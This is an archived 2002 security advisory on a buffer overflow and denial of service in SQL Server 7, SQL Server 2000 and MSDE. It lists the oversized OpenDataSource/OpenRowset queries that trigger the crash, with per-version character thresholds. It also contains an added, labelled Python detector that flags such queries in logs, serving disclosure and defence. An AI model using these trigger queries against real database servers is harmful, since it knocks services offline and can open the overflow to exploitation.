[NT] MSDE, SQL Server 7 & 2000 Adhoc Heterogeneous Queries Buffer Overflow and DoS

From: support@securiteam.com
Date: 02/24/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 24 Feb 2002 00:51:58 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

MSDE, SQL Server 7 & 2000 Adhoc Heterogeneous Queries Buffer Overflow and DoS
------------------------------------------------------------------------

SUMMARY

A distributed query may access data from multiple heterogeneous data
sources, which can be stored on the same computer or on different
computers. Microsoft SQL Server supports distributed queries by using OLE
DB, the Microsoft specification of an application programming interface
(API) for universal data access. Distributed queries provide SQL Server
users with access to:
 - Distributed data stored on multiple computers that are running SQL
Server.
 - Heterogeneous data stored in various relational and non-relational data
sources that can be accessed through an OLE DB provider.

You can reference heterogeneous OLE DB data sources in Transact-SQL
statements by:
 - Linked servers and the OpenQuery function.
 - The OpenDataSource and OpenRowset functions.

The OpenDataSource and OpenRowset functions are accessible to all users
and contain an unchecked buffer in one of their parameters. The buffer
overflow and DoS occur when an overly long string is supplied in the
"provider name" parameter (the first argument of either function).

DETAILS

Vulnerable systems:
MSDE, SQL Server 7 and SQL Server 2000, with all service packs and fixes
applied.

In SQL Server 7 the overflow starts at character number 6819, and if the
number of characters is >= 6918 the server crashes:

SELECT * FROM OpenDataSource('XXXXXXXXXXX...','')...nothing
  ---> 'XXXXXXXXXXX...' is 6819 characters or more

SELECT * FROM OPENROWSET('XXXXXXXXXXX...','','')
  ---> 'XXXXXXXXXXX...' is 6819 characters or more

In SQL Server 2000 the overflow starts at character number 6887, and if the
number of characters is >= 6998 the server crashes:

SELECT * FROM OpenDataSource('XXXXXXXXXXX...','')...nothing
  ---> 'XXXXXXXXXXX...' is 6887 characters or more

SELECT * FROM OPENROWSET('XXXXXXXXXXX...','','')
  ---> 'XXXXXXXXXXX...' is 6887 characters or more
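Because the trigger is simply an oversized first argument to one of these two functions, an administrator reviewing captured statement text can flag attempts mechanically. The following detector is an added example, not part of the advisory; it assumes statement text is available one statement per line (for instance exported from a trace), uses the advisory's per-version thresholds, and runs over constructed sample lines.

```python
import re

# Lengths at which the advisory says the provider-name overflow begins.
PROVIDER_NAME_LIMIT = {"sql7": 6819, "sql2000": 6887}

# OpenDataSource(/OpenRowset( followed by its first argument as a T-SQL
# string literal ('...', with '' as an escaped quote, optional N prefix).
_CALL = re.compile(
    r"\b(OPENDATASOURCE|OPENROWSET)\s*\(\s*N?'((?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)


def provider_name_lengths(statement):
    """Return (function, provider-name length) for every ad hoc query call.

    Escaped quotes count as one character, as the server sees them.
    """
    return [
        (m.group(1).upper(), len(m.group(2).replace("''", "'")))
        for m in _CALL.finditer(statement)
    ]


def flag_oversized(statement, version="sql2000"):
    """Calls whose provider name reaches the overflow length for `version`."""
    limit = PROVIDER_NAME_LIMIT[version]
    return [(f, n) for f, n in provider_name_lengths(statement) if n >= limit]


def scan_log(lines, version="sql2000"):
    """Indexes of log lines (one statement each) containing a flagged call."""
    return [i for i, line in enumerate(lines) if flag_oversized(line, version)]


# Constructed sample statements: a normal query, a legitimate OPENROWSET
# with a short provider name, and one with an oversized provider name.
SAMPLE_LOG = [
    "SELECT name FROM sysobjects WHERE type = 'U'",
    "SELECT * FROM OPENROWSET('SQLOLEDB', 'srv';'user';'pass', 'SELECT 1')",
    "SELECT * FROM OpenDataSource('" + "X" * 7000 + "', '')...nothing",
]

if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print("line", i, "flagged:", flag_oversized(SAMPLE_LOG[i]))
```

The thresholds are applied with >= because the advisory states the overflow starts at that character count; lower the limit if you want a safety margin.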

ADDITIONAL INFORMATION

The information has been provided by <mailto:cesarc56@yahoo.com> c c.
